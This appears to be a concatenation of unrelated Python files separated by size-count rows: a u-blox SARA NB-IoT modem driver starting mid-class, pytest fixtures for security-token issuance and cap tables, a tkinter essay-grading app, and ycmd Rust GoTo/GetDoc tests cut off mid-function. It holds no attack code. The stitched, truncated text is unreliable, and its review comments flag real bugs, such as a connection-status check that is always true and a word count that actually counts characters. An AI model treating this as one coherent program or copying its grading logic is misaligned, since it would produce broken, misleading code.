        # 17 is the IP protocol number for UDP.
        at_command = f'AT+NSOCR="DGRAM",17'
        if port:
            at_command = at_command + f',{port}'
        socket_id = self._at_action(at_command)
        sock = UDPSocket(socket_id, self, port)
        return sock
    def _create_tcp_socket(self, port):
        """
        N211 module only supports UDP.
        """
        raise NotImplementedError('Sara211 does not support TCP')
    def close_socket(self, socket_id):
        """
        Will send the correct AT action to close specified socket and remove
        the reference of it on the module object.

        :raises ValueError: if the socket id is not registered on this module.
        """
        logger.info(f'Closing socket {socket_id}')
        if socket_id not in self.sockets.keys():
            raise ValueError('Specified socket id does not exist')
        result = self._at_action(f'{self.AT_CLOSE_SOCKET}={socket_id}')
        del self.sockets[socket_id]
        return result
    def send_udp_data(self, socket: int, host: str, port: int, data: str):
        """
        Send a UDP message

        The payload is hex-encoded as required by the NSOST command.
        """
        logger.info(f'Sending UDP message to {host}:{port}  :  {data}')
        _data = binascii.hexlify(data.encode()).upper().decode()
        length = len(data)
        atc = f'{self.AT_SEND_TO}={socket},"{host}",{port},{length},"{_data}"'
        result = self._at_action(atc)
        return result
    def receive_udp_data(self):
        """
        Recieve a UDP message

        Blocks until a +NSONMI URC announces a pending message, then reads
        and decodes it with AT+NSORF.
        """
        logger.info(f'Waiting for UDP message')
        self._read_line_until_contains('+NSONMI')
        message_info = self.available_messages.pop(0)
        message = self._at_action(f'AT+NSORF={message_info.decode()}')
        response = self._parse_udp_response(message[0])
        logger.info(f'Recieved UDP message: {response}')
        return response
    def _at_action(self, at_command, timeout=10, capture_urc=False):
        """
        Small wrapper to issue a AT command. Will wait for the Module to return
        OK. Some modules return answers to AT actions as URC:s before the OK
        and to handle them as IRCs it is possible to set the capture_urc flag
        and all URCs between the at action and OK will be returned as result.
        """
        logger.debug(f'Applying AT Command: {at_command}')
        self._write(at_command)
        time.sleep(0.02)  # To give the end devices some time to answer.
        irc = self._read_line_until_contains('OK', timeout=timeout,
                                             capture_urc=capture_urc)
        if irc is not None:
            logger.debug(f'AT Command response = {irc}')
        return irc
    def _write(self, data):
        """
        Writing data to the module is simple. But it needs to end with \r\n
        to accept the command. The module will answer with an empty line as
        acknowledgement. If echo is enabled everything that the is sent to the
        module is returned in the serial line. So we just need to omit it from
        the acknowledge.

        :raises ValueError: if the echo or the acknowledgement does not match
            what was sent.
        """
        data_to_send = data
        if isinstance(data, str):  # if someone sent in a string make it bytes
            data_to_send = data.encode()
        if not data_to_send.endswith(b'\r\n'):
            # someone didnt add the CR an LN so we need to send it
            data_to_send += b'\r\n'
        # start_time = time.time()
        self._serial.write(data_to_send)
        time.sleep(0.02)  # To give the module time to respond.
        logger.debug(f'Sent: {data_to_send}')
        ack = self._serial.read_until()
        logger.debug(f'Recieved ack: {ack}')
        if self.echo:
            # when echo is on we will have recieved the message we sent and
            # will get it in the ack response read. But it will not send \n.
            # so we can omitt the data we send + i char for the \r
            _echo = ack[:-2]
            wanted_echo = data_to_send[:-2] + b'\r'
            if _echo != wanted_echo:
                raise ValueError(f'Data echoed from module: {_echo} is not the '
                                 f'same data as sent to the module')
            ack = ack[len(wanted_echo):]
        if ack != b'\r\n':
            raise ValueError(f'Ack was not received properly, received {ack}')
    @staticmethod
    def _remove_line_ending(line: bytes):
        """
        To not have to deal with line endings in the data we can use this to
        remove them.
        """
        if line.endswith(b'\r\n'):
            return line[:-2]
        else:
            return line
    def _read_line_until_contains(self, slice, capture_urc=False, timeout=5):
        """
        Similar to read_until, but will read whole lines so we can use proper
        timeout management. Any URC:s that is read will be handled and we will
        return the IRC:s collected. If capture_urc is set we will return all
        data as IRCs.

        NOTE(review): the parameter name `slice` shadows the builtin; cannot
        be renamed here without touching callers.
        :raises ATTimeoutError: if the wanted slice is not seen within timeout.
        :raises ATError: if the module reports ERROR.
        """
        _slice = slice
        if isinstance(slice, str):
            _slice = slice.encode()
        data_list = list()
        irc_list = list()
        start_time = time.time()
        while True:
            try:
                data = self._serial.read_until()
            except serial.SerialTimeoutException:
                # continue to read lines until AT Timeout
                duration = time.time() - start_time
                if duration > timeout:
                    raise ATTimeoutError
                continue
            line = self._remove_line_ending(data)
            if line.startswith(b'+'):
                if capture_urc:
                    irc_list.append(line)  # add the urc as an irc
                else:
                    self._process_urc(line)
            elif line == b'OK':
                pass
            elif line.startswith(b'ERROR'):
                raise ATError('Error on AT Command')
            elif line == b'':
                pass
            else:
                irc_list.append(line)  # the can only be an IRC
            if _slice in line:
                data_list.append(line)
                break
            else:
                data_list.append(line)
            duration = time.time() - start_time
            if duration > timeout:
                raise ATTimeoutError
        clean_list = [response for response in data_list if not response == b'']
        logger.debug(f'Received: {clean_list}')
        return irc_list
    @staticmethod
    def _parse_udp_response(message: bytes):
        # Response format: socket,ip,port,length,hex-data,remaining; only the
        # decoded payload is returned.
        _message = message.replace(b'"', b'')
        socket, ip, port, length, _data, remaining_bytes = _message.split(b',')
        data = bytes.fromhex(_data.decode())
        return data
    def _process_urc(self, urc: bytes):
        """
        URC = unsolicited result code
        When waiting on answer from the module it is possible that the module
        sends urcs via +commands. So after the urcs are
        collected we run this method to process them.
        """
        _urc = urc.decode()
        logger.debug(f'Processing URC: {_urc}')
        urc_id = _urc[1:_urc.find(':')]
        if urc_id == 'CSCON':
            self._update_connection_status_callback(urc)
        elif urc_id == 'CEREG':
            self._update_eps_reg_status_callback(urc)
        elif urc_id == 'CGPADDR':
            self._update_ip_address_callback(urc)
        elif urc_id == 'NSONMI':
            self._add_available_message_callback(urc)
        elif urc_id == 'CME ERROR':
            self._handle_cme_error(urc)
        else:
            logger.debug(f'Unhandled urc: {urc}')
    def _handle_cme_error(self, urc: bytes):
        """
        Callback to raise CME Error.
        """
        raise CMEError(urc.decode())
    def _add_available_message_callback(self, urc: bytes):
        """
        Callback to handle recieved messages.

        Stores the URC payload so receive_udp_data() can pick it up.
        """
        _urc, data = urc.split(b':')
        result = data.lstrip()
        logger.debug(f'Recieved data: {result}')
        self.available_messages.append(result)
    def update_radio_statistics(self):
        """
        Read radio statistics and update the module object.
        """
        radio_data = self._at_action(self.AT_RADIO_INFORMATION)
        self._parse_radio_stats(radio_data)
    def _update_connection_status_callback(self, urc):
        """
        In the AT urc +CSCON: 1 the last char is indication if the
        connection is idle or connected

        NOTE(review): when `urc` is bytes, urc[-1] is the byte VALUE
        (e.g. 48 for '0'), so bool(int(urc[-1])) is always True. Compare
        _update_eps_reg_status_callback which uses int(chr(urc[-1])).
        Likely a bug — confirm against live module output before fixing.
        """
        status = bool(int(urc[-1]))
        self.connected = status
        logger.info(f'Changed the connection status to {status}')
    def _update_eps_reg_status_callback(self, urc):
        """
        The command could return more than just the status.
        Maybe a regex would be good
        But for now we just check the last as int
        """
        status = int(chr(urc[-1]))
        self.registration_status = status
        logger.info(f'Updated status EPS Registration = {status}')
    def _update_ip_address_callback(self, urc: bytes):
        """
        Update the IP Address of the module
        """
        # TODO: this is per socket. Need to implement socket handling
        _urc = urc.decode()
        ip_addr = _urc[(_urc.find('"') + 1):-1]
        self.ip = ip_addr
        logger.info(f'Updated the IP Address of the module to {ip_addr}')
    def _parse_radio_stats(self, irc_buffer):
        """
        Parser for radio statistic result

        NOTE(review): there is no branch for 'Signal power'-style name
        'RSRP', so self.radio_rsrp is never assigned here even though the
        attribute exists — confirm against NUESTATS output and add the
        missing branch if the module reports it.
        """
        stats = [self._parse_radio_stats_string(item) for item in irc_buffer]
        for stat in stats:
            if not stat:
                continue
            if stat.type == 'RADIO' and stat.name == 'Signal power':
                self.radio_signal_power = stat.value
            elif stat.type == 'RADIO' and stat.name == 'Total power':
                self.radio_total_power = stat.value
            elif stat.type == 'RADIO' and stat.name == 'TX power':
                self.radio_tx_power = stat.value
            elif stat.type == 'RADIO' and stat.name == 'TX time':
                self.radio_tx_time = stat.value
            elif stat.type == 'RADIO' and stat.name == 'RX time':
                self.radio_rx_time = stat.value
            elif stat.type == 'RADIO' and stat.name == 'Cell ID':
                self.radio_cell_id = stat.value
            elif stat.type == 'RADIO' and stat.name == 'ECL':
                self.radio_ecl = stat.value
            elif stat.type == 'RADIO' and stat.name == 'SNR':
                self.radio_snr = stat.value
            elif stat.type == 'RADIO' and stat.name == 'EARFCN':
                self.radio_earfcn = stat.value
            elif stat.type == 'RADIO' and stat.name == 'PCI':
                self.radio_pci = stat.value
            elif stat.type == 'RADIO' and stat.name == 'RSRQ':
                self.radio_rsrq = stat.value
            else:
                logger.debug(f'Unhandled statistics data: {stat}')
    @staticmethod
    def _parse_radio_stats_string(stats_byte_string: bytes):
        """
        The string is like: b'NUESTATS: "RADIO","Signal power",-682'
        :param stats_byte_string:
        :return: NamedTuple Stats
        """
        parts = stats_byte_string.decode().split(':')
        irc: str = parts[0].strip()
        data: str = parts[1].strip().replace('"', '')
        data_parts = data.split(',')
        if irc == 'NUESTATS':
            return Stats(data_parts[0], data_parts[1], int(data_parts[2]))
        else:
            return None
    def __repr__(self):
        return f'NBIoTModule(serial_port="{self._serial_port}")'
    def _await_connection(self, roaming, timeout=180):
        """
        The process to verify that connection has occured is a bit different on
        different devices. On N211 we need to wait until we get the +CEREG: x
        URC (5 = registered roaming, 1 = registered home network).
        """
        logging.info(f'Awaiting Connection')
        if roaming:
            self._read_line_until_contains('CEREG: 5')
        else:
            self._read_line_until_contains('CEREG: 1')
class SaraR4Module(SaraN211Module):
    """
    Represents a Ublox SARA R4XX module.

    Differs from the N211 in serial settings, socket commands (USOCR/USOCL),
    TCP support, and the way connection/radio status must be polled.
    """
    # R4 uses a faster serial link with hardware flow control.
    BAUDRATE = 115200
    RTSCTS = 1
    DEFAULT_BANDS = [20]
    # AT command strings (overriding/extending the N211 set).
    AT_CREATE_UDP_SOCKET = 'AT+USOCR=17'
    AT_CREATE_TCP_SOCKET = 'AT+USOCR=6'
    AT_ENABLE_LTE_M_RADIO = 'AT+URAT=7'
    AT_ENABLE_NBIOT_RADIO = 'AT+URAT=8'
    AT_CLOSE_SOCKET = 'AT+USOCL'
    AT_REBOOT = 'AT+CFUN=15'  # R4 specific
    REBOOT_TIME = 10
    SUPPORTED_SOCKET_TYPES = ['UDP', 'TCP']
    # Radio Access Technology name -> AT command enabling it.
    SUPPORTED_RATS = {'NBIOT': AT_ENABLE_NBIOT_RADIO,
                      'LTEM': AT_ENABLE_LTE_M_RADIO}
    def __init__(self, serial_port: str, roaming=False, echo=True):
        super().__init__(serial_port, roaming, echo)
        # Currently selected RAT ('NBIOT' or 'LTEM'), set by set_radio_mode().
        self.current_rat = None
    def setup(self, radio_mode='NBIOT'):
        """
        Running all commands to get the module up an working

        :param radio_mode: which RAT to enable, key of SUPPORTED_RATS.
        """
        self.read_imei()
        self.set_radio_mode(mode=radio_mode)
        self.enable_radio_functions()
        self.enable_network_registration()
        self.set_error_format()
        self.set_data_format()
        self.enable_quality_reporting()
    def set_data_format(self):
        self._at_action('AT+UDCONF=1,1')  # Set data format to HEX
        logger.info('Data format set to HEX')
    def read_imei(self):
        """Read the module IMEI (AT+CGSN) and store it on the instance."""
        logger.info('Reading IMEI from module')
        result = self._at_action('AT+CGSN')
        self.imei = int(result[0])
    def set_error_format(self):
        self._at_action('AT+CMEE=2')  # enable verbose errors
        logger.info('Verbose errors enabled')
    def set_band_mask(self, bands: list = None):
        """
        Band is set using a bit for each band. Band 1=bit 0, Band 64=Bit 63
        .. note:
            Only supports NB IoT RAT.

        :param bands: list of band numbers; defaults to DEFAULT_BANDS.
        """
        logger.info(f'Setting Band Mask for bands {bands}')
        bands_to_set = bands or self.DEFAULT_BANDS
        total_band_mask = 0
        for band in bands_to_set:
            # Each band contributes one bit to the mask.
            individual_band_mask = 1 << (band - 1)
            total_band_mask = total_band_mask | individual_band_mask
        self._at_action(f'AT+UBANDMASK=1,{total_band_mask},{total_band_mask}')
    def enable_quality_reporting(self):
        logger.info('Enables reporting of RSRP and RSRQ via AT+UCGED')
        self._at_action('AT+UCGED=5')
    def set_radio_mode(self, mode):
        """Select the RAT; `mode` must be a key of SUPPORTED_RATS."""
        response = self._at_action(self.SUPPORTED_RATS[mode.upper()])
        logger.info(f'Radio Mode set to {mode}')
        self.current_rat = mode.upper()
        return response
    def set_pdp_context(self, apn, pdp_type="IP", cid=1):
        """Define a PDP context (AT+CGDCONT) with the given APN."""
        logger.info(f'Setting PDP Context')
        _at_command = f'AT+CGDCONT={cid},"{pdp_type}","{apn}"'
        self._at_action(_at_command)
        logger.info(f'PDP Context: {apn}, {pdp_type}')
    def update_radio_statistics(self):
        """
        On the R4xx only rsrp and rsrq is available.

        Parses the +RSRQ/+RSRP URCs returned by AT+UCGED?.
        """
        result = self._at_action('AT+UCGED?', capture_urc=True)
        cell_id = None
        channel_nr = None
        rsrq = None
        rsrp = None
        try:
            for item in result:
                data = item[7:]  # remove the data description
                if data.endswith(b'\r'):
                    data = data[:-2]
                else:
                    data = data[:-1]
                if item.startswith(b'+RSRQ'):
                    cell_id, channel_nr, rsrq = data.split(b',')
                elif item.startswith(b'+RSRP'):
                    cell_id, channel_nr, rsrp = data.split(b',')
            self.radio_earfcn = channel_nr
            self.radio_cell_id = cell_id
            self.radio_rsrp = float(rsrp.decode().replace('"', ''))
            self.radio_rsrq = float(rsrq.decode().replace('"', ''))
        except ValueError as e:
            logger.info('Error in parsing radio statistics')
    def _create_upd_socket(self, port):
        """Create a UDP socket via AT+USOCR and register it on the module.

        NOTE(review): socket id is parsed from only the LAST character of the
        response, so ids >= 10 would be mis-parsed. Also registers the socket
        here although create_socket() registers it again (harmless overwrite).
        """
        at_command = f'{self.AT_CREATE_UDP_SOCKET}'
        if port:
            at_command = at_command + f',{port}'
        response = self._at_action(at_command, capture_urc=True)
        socket_id = int(chr(response[0][-1]))
        sock = UDPSocket(socket_id, self, port)
        self.sockets[sock.socket_id] = sock
        return sock
    def send_udp_data(self, socket: int, host: str, port: int, data: str):
        """
        Send a UDP message

        Uses the R4's AT+USOST command; payload is hex-encoded.
        """
        logger.info(f'Sending UDP message to {host}:{port}  :  {data}')
        _data = binascii.hexlify(data.encode()).upper().decode()
        length = len(data)
        atc = f'AT+USOST={socket},"{host}",{port},{length},"{_data}"'
        result = self._at_action(atc)
        return result
    def read_udp_data(self, socket, length, timeout=10):
        """
        Reads data from a udp socket.
        ..note
            there is an issue on the R410 module that it is not issuing URCs
            So to get the data we poll for data until we get some.

        :return: parsed response fields, or None when nothing arrived
            within `timeout` seconds.
        """
        start_time = time.time()
        while True:
            time.sleep(2)  # poll interval
            data = self._at_action(f'AT+USORF={socket},{length}',
                                   capture_urc=True)
            result = data[0].replace(b'"', b'').split(b',')[1:]  # remove URC
            if result[0]:  # the IP address part
                return result
            duration = time.time() - start_time
            if duration > timeout:
                break
        logger.info('No UDP response read')
        return None
    def set_listening_socket(self, socket: int, port: int):
        """Set a socket into listening mode to be able to receive data on
        the socket."""
        self._at_action(f'AT+USOLI={socket},{port}')
    def _await_connection(self, roaming, timeout=180):
        """
        The process to verify that connection has occurred is a bit different on
        different devices. On R4xx we need continuously poll the connection
        status and see if the connection status has changed.

        :raises ConnectionTimeoutError: if not registered within `timeout` s.
        """
        logging.info(f'Awaiting Connection')
        start_time = time.time()
        while True:
            time.sleep(2)  # poll interval; CEREG? reply updates registration_status via URC handling
            self._at_action('AT+CEREG?')
            if self.registration_status == 0:
                continue
            # 5 = registered roaming, 1 = registered home network.
            if roaming and self.registration_status == 5:
                break
            if (not roaming) and self.registration_status == 1:
                break
            elapsed_time = time.time() - start_time
            if elapsed_time > timeout:
                raise ConnectionTimeoutError(f'Could not connect')
| 23,977 | 7,428 |
import pytest
from sto.distribution import read_csv
from sto.ethereum.issuance import contract_status
from sto.ethereum.status import update_status
from sto.ethereum.tokenscan import token_scan
from sto.generic.captable import generate_cap_table, print_cap_table
from sto.models.implementation import TokenScanStatus, TokenHolderAccount
from sto.identityprovider import NullIdentityProvider
from sto.cli.main import cli
@pytest.fixture(params=['unrestricted', 'restricted'])
def sample_token(
    logger,
    dbsession,
    web3,
    private_key_hex,
    sample_csv_file,
    db_path,
    click_runner,
    get_contract_deployed_tx,
    kyc_contract,
    monkeypatch_get_contract_deployed_tx,
    request
):
    """Create a security token used in these tests.

    Parametrized to run every dependent test twice: once with an
    'unrestricted' transfer policy and once with a 'restricted' (KYC
    whitelisted) one. Issues the token via the CLI, broadcasts the
    transactions, verifies the deployed contract status, and returns the
    token contract address.
    """
    if request.param == 'restricted':
        from sto.ethereum.utils import priv_key_to_address
        # whitelist owner
        # Restricted transfers require the issuing address to pass KYC first.
        result = click_runner.invoke(
            cli,
            [
                '--database-file', db_path,
                '--ethereum-private-key', private_key_hex,
                '--ethereum-gas-limit', 999999999,
                'kyc-manage',
                '--whitelist-address', priv_key_to_address(private_key_hex)
            ]
        )
        assert result.exit_code == 0
    # Prepare the token issuance transactions (not yet broadcast).
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            'issue',
            '--name', "Moo Corp",
            '--symbol', "MOO",
            '--url', "https://tokenmarket.net",
            '--amount', 9999,
            '--transfer-restriction', request.param
        ]
    )
    assert result.exit_code == 0
    # Broadcast the prepared transactions to the test chain.
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            'tx-broadcast',
        ]
    )
    assert result.exit_code == 0
    token_address = get_contract_deployed_tx(dbsession, "SecurityToken").contract_address
    # Check that we can view the token status
    status = contract_status(logger,
                             dbsession,
                             "testing",
                             web3,
                             ethereum_abi_file=None,
                             ethereum_private_key=private_key_hex,
                             ethereum_gas_limit=None,
                             ethereum_gas_price=None,
                             token_contract=token_address,
                             )
    assert status["name"] == "Moo Corp"
    # Token amount is scaled by 18 decimals on-chain.
    assert status["totalSupply"] == 9999 * 10 ** 18
    dbsession.commit()
    return token_address
@pytest.fixture
def scanned_distribution(logger, dbsession, web3, private_key_hex, sample_csv_file, sample_token, click_runner, db_path, monkeypatch_create_web3):
    """Create some sample transactions so we can scan the token holder balances.

    Whitelists every holder from the sample CSV, distributes tokens to
    them, broadcasts the queued transactions, then runs the token scanner.
    Returns the token contract address.
    """
    token_address = sample_token
    entries = read_csv(logger, sample_csv_file)
    for entry in entries:
        # whitelist customers
        result = click_runner.invoke(
            cli,
            [
                '--database-file', db_path,
                '--ethereum-private-key', private_key_hex,
                '--ethereum-gas-limit', 999999999,
                'kyc-manage',
                '--whitelist-address', entry.address
            ]
        )
        assert result.exit_code == 0
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            "distribute-multiple",
            '--csv-input', sample_csv_file,
            '--address', token_address
        ]
    )
    assert result.exit_code == 0
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            'tx-broadcast',
        ]
    )
    assert result.exit_code == 0
    # Check they got mined
    # Send transactions to emphmereal test chain
    # NOTE(review): this second tx-broadcast immediately after the first
    # looks redundant — confirm whether a re-broadcast is intentional.
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            'tx-broadcast',
        ]
    )
    assert result.exit_code == 0
    # Check they got mined
    # NOTE(review): `txs` is never inspected; update_status() is called
    # for its side effect of marking broadcast transactions as mined.
    txs = update_status(
        logger,
        dbsession,
        "testing",
        web3,
        ethereum_private_key=private_key_hex,
        ethereum_gas_limit=None,
        ethereum_gas_price=None,
    )
    # Check that rerun does not recreate txs
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            "distribute-multiple",
            '--csv-input', sample_csv_file,
            '--address', token_address
        ]
    )
    assert result.exit_code == 0
    result = click_runner.invoke(
        cli,
        [
            '--database-file', db_path,
            '--ethereum-private-key', private_key_hex,
            '--ethereum-gas-limit', 999999999,
            'tx-broadcast',
        ]
    )
    assert result.exit_code == 0
    token_scan(logger, dbsession, "testing", web3, None, token_address)
    return token_address
def test_cap_table_formats(logger, dbsession, network, scanned_distribution, web3):
    """Exercise cap table generation with every ordering combination."""
    token_address = scanned_distribution
    identity_provider = NullIdentityProvider()
    columns = ["address", "name", "balance", "updated"]
    for direction in ("asc", "desc"):
        for column in columns:
            generate_cap_table(
                logger,
                dbsession,
                token_address,
                order_by=column,
                order_direction=direction,
                identity_provider=identity_provider,
                include_empty=False,
                TokenScanStatus=TokenScanStatus,
                TokenHolderAccount=TokenHolderAccount,
            )
def test_cap_table_printer(logger, dbsession, network, scanned_distribution, web3):
    """Render a generated cap table through the console printer."""
    table = generate_cap_table(
        logger,
        dbsession,
        scanned_distribution,
        order_by="balance",
        order_direction="desc",
        identity_provider=NullIdentityProvider(),
        include_empty=False,
        TokenScanStatus=TokenScanStatus,
        TokenHolderAccount=TokenHolderAccount,
    )
    print_cap_table(table, max_entries=1000, accuracy=2)
| 6,965 | 2,098 |
from __future__ import absolute_import
from __future__ import print_function
import six
import language_check
from tkinter import *
from tkinter import messagebox
import rake
import operator
import io
# Index (1-based) of the question currently displayed.
counter = 1
# Load the question bank once at startup.  The context manager closes the
# handle (the original leaked it and shadowed the builtin name `file`).
with open("questions.txt", "r") as question_file:
    q = [line.rstrip('\n') for line in question_file]
# Per-question marks, one slot per question.
totmark = [0, 0, 0, 0, 0, 0]
def nex():
    """Advance to the next question, warning when none remain."""
    global counter
    if counter >= 6:
        messagebox.showwarning("Limit Exceeded", "Sorry, No more questions available!")
        return
    counter += 1
    ques.set(str(q[counter - 1]))
    #print(counter)
def prev():
    """Step back to the previous question, warning at the first one."""
    global counter
    if counter <= 1:
        messagebox.showwarning("Limit Exceeded", "This is the first question!")
        return
    counter -= 1
    ques.set(str(q[counter - 1]))
    #print(counter)
def finish():
    """Show the total score accumulated over all answered questions."""
    # sum() replaces the original manual accumulation loop.
    total = sum(totmark)
    messagebox.showinfo("Total Score", "The total score obtained in the test=" + str(total) + "/40")
def enFunc():
    """Grade the answer currently in the text box and display the result.

    Scoring: up to 10 marks for length, 30 for keyword coverage against a
    model-answer file, 10 for grammar — then scaled to 12 (questions 1-2)
    or 4 (questions 3-6) so the six questions total 40.
    """
    global counter
    ans = entry.get('1.0','end')
    n=0
    # NOTE(review): iterating a string yields characters, so each `line` is
    # one character and `words` ends up with len(ans) single-char entries;
    # n is effectively a CHARACTER count, not a word count.  Confirm the
    # length thresholds below were tuned against this metric.
    for line in ans:
        words=[line.split(' ') for line in ans]
        n=len(words)
    # Length marks: questions 1-2 expect long essays, the rest short answers.
    if(counter==1 or counter==2):
        if(n>=850):
            marks1=10
        elif(n>=400):
            marks1=5
        else:
            marks1=3
    else:
        if(n>=250):
            marks1=10
        elif(n>=100):
            marks1=5
        else:
            marks1=3
    a=marks1
    # Model-answer file for the current question.
    fname="data/docs/mp"+str(counter)+".txt"
    stoppath = "data/stoplists/SmartStoplist.txt"
    rake_object = rake.Rake(stoppath)
    # NOTE(review): sample_file is opened but never read or closed (the file
    # is re-opened below as f1) — this handle leaks.
    sample_file = io.open(fname, 'r',encoding="iso-8859-1")
    text = ans
    sentenceList = rake.split_sentences(text)
    #for sentence in sentenceList:
    # print("Sentence:", sentence)
    stopwords = rake.load_stop_words(stoppath)
    stopwordpattern = rake.build_stop_word_regex(stoppath)
    phraseList = rake.generate_candidate_keywords(sentenceList, stopwordpattern, stopwords)
    #print("Phrases:", phraseList)
    wordscores = rake.calculate_word_scores(phraseList)
    keywordcandidates = rake.generate_candidate_keyword_scores(phraseList, wordscores)
    """for candidate in keywordcandidates.keys():
    print("Candidate: ", candidate, ", score: ", keywordcandidates.get(candidate))
    sortedKeywords = sorted(six.iteritems(keywordcandidates), key=operator.itemgetter(1), reverse=True)
    totalKeywords = len(sortedKeywords)
    for keyword in sortedKeywords[0:int(totalKeywords/3)]:
    print("Keyword: ", keyword[0], ", score: ", keyword[1])"""
    # RAKE keyword extraction over the student's answer.
    keyw=dict(rake_object.run(text))
    print(keyw)
    #l1=len(keyw)
    print(fname)
    # Read the model answer; its third blank-line-separated section is
    # assumed to hold the expected keywords, one per line.
    f1=io.open(fname, 'r',encoding="iso-8859-1")
    text1=f1.read()
    que=text1.split("\n")
    print(que[0])
    l=text1.split("\n\n")
    kw=l[2].split("\n")
    print("keyword in original file=",kw)
    total=len(kw)
    print("No of keywords in original file=",total)
    # Count expected keywords found (substring match, case-insensitive)
    # among the extracted candidate phrases.
    c=0
    for i in keyw:
        for j in range(0,total):
            if(kw[j].lower() in i.lower()):
                print("Detected= " +str(i))
                c=c+1
    print("count=",c)
    percentage=(c/total)*100
    # NOTE(review): the bracket boundaries below look inconsistent — the
    # >=60 branch tests `<80` (dead above 70), and the 50-60 bracket awards
    # 28 marks, more than the 60-70 bracket's 24.  Likely typos to confirm.
    if(percentage>=90):
        marks2=30
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    elif(percentage>=80 and percentage<90):
        marks2=28
        message = "Marks obtained for keyword:"+ str(marks2) + "/30"
    elif(percentage>=70 and percentage<80):
        marks2=26
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    elif(percentage>=60 and percentage<80):
        marks2=24
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    elif(percentage>=50 and percentage<60):
        marks2=28
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    elif(percentage>=40 and percentage<50):
        marks2=25
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    else:
        marks2 = 0
        message = "Marks obtained for keyword:" + str(marks2) + "/30"
    mes2text = "\nMarks for length = " + str(a) + "/10" + "\nLength = " + str(n)
    print(mes2text)
    print(message)
    b=marks2
    # Grammar scoring via LanguageTool: fewer detected errors, more marks.
    tool=language_check.LanguageTool('en-US')
    count=0
    text=str(ans)
    txtlen=len(text.split())
    setxt = set(text.split())
    setlen = len(setxt)
    matches=tool.check(text)
    #print("Error:",matches)
    print("No. of Errors=",len(matches))
    noOfError=len(matches)
    for i in range (0,noOfError):
        print(matches[i].msg)
    if (noOfError<=3 and n>0):
        marks3=10
    elif (noOfError<=5):
        marks3=8
    elif (noOfError<=8):
        marks3=5
    else:
        marks3=3
    print("Marks obtained after parsing=",marks3,"/10")
    c=marks3
    # Combine the three components (10 + 30 + 10 = 50) and rescale.
    d=a+b+c
    print("Marks obtained out of 50 is=",d,"/50")
    if(counter==1 or counter==2):
        tot=(d/50)*12
    else:
        tot=(d/50)*4
    m="\nMarks obtained for this question is"+str(tot)
    messagebox.showinfo("Result",m)
    global totmark
    totmark[counter-1]=tot
# --- GUI construction (runs at import time) ---
root = Tk()
root.geometry('800x1800')
label= Label(root,text="ANSWER ALL THE FOLLOWING QUESTIONS",bg="lightyellow",bd=20)
label.place(x=300,y=10)
# StringVar backing the question label; updated by nex()/prev().
ques= StringVar()
ques.set(str(q[counter-1]))
labelQ=Label(root,textvariable=ques,text=str(q[0]),width=100, bg="lightyellow", bd=20)
labelQ.place(x=10,y=100)
# Multi-line answer box read by enFunc().
entry= Text(root)
entry.place(x=100,y=200)
prevBtn= Button(root, text = '<', command = prev)
prevBtn.place(x=120,y=600)
button1= Button(root, text = 'Submit', command = enFunc)
button1.place(x=400,y=600)
nextBtn= Button(root, text = '>', command = nex)
nextBtn.place(x=700,y=600)
finishbtn=Button(root,text='Finish',command=finish)
finishbtn.place(x=400,y=650)
root.mainloop()
| 5,729 | 2,131 |
# Copyright (C) 2015-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, contains, has_entry
from mock import patch
from nose.tools import eq_
from ycmd.tests.rust import IsolatedYcmd, PathToTestFile, SharedYcmd
from ycmd.tests.test_utils import ( BuildRequest,
MockProcessTerminationTimingOut,
WaitUntilCompleterServerReady )
from ycmd.utils import ReadFile
@SharedYcmd
def RunGoToTest( app, params ):
  """Issue a GoTo-family subcommand against test.rs and verify the target."""
  filepath = PathToTestFile( 'test.rs' )
  request = BuildRequest( completer_target = 'filetype_default',
                          command_arguments = [ params[ 'command' ] ],
                          line_num = 7,
                          column_num = 12,
                          contents = ReadFile( filepath ),
                          filetype = 'rust',
                          filepath = filepath )
  response = app.post_json( '/run_completer_command', request )
  eq_( { 'line_num': 1, 'column_num': 8, 'filepath': filepath },
       response.json )
def Subcommands_GoTo_all_test():
  """Yield one GoTo test per supported navigation command."""
  for command in [ 'GoTo', 'GoToDefinition', 'GoToDeclaration' ]:
    yield RunGoToTest, { 'command': command }
@SharedYcmd
def Subcommands_GetDoc_Method_test( app ):
  """GetDoc on a documented function returns its signature and doc text."""
  filepath = PathToTestFile( 'docs.rs' )
  request = BuildRequest( filepath = filepath,
                          filetype = 'rust',
                          line_num = 7,
                          column_num = 9,
                          contents = ReadFile( filepath ),
                          command_arguments = [ 'GetDoc' ],
                          completer_target = 'filetype_default' )
  response = app.post_json( '/run_completer_command', request ).json
  eq_( response,
       { 'detailed_info': 'pub fn fun()\n---\nsome docs on a function' } )
@SharedYcmd
def Subcommands_GetDoc_Fail_Method_test( app ):
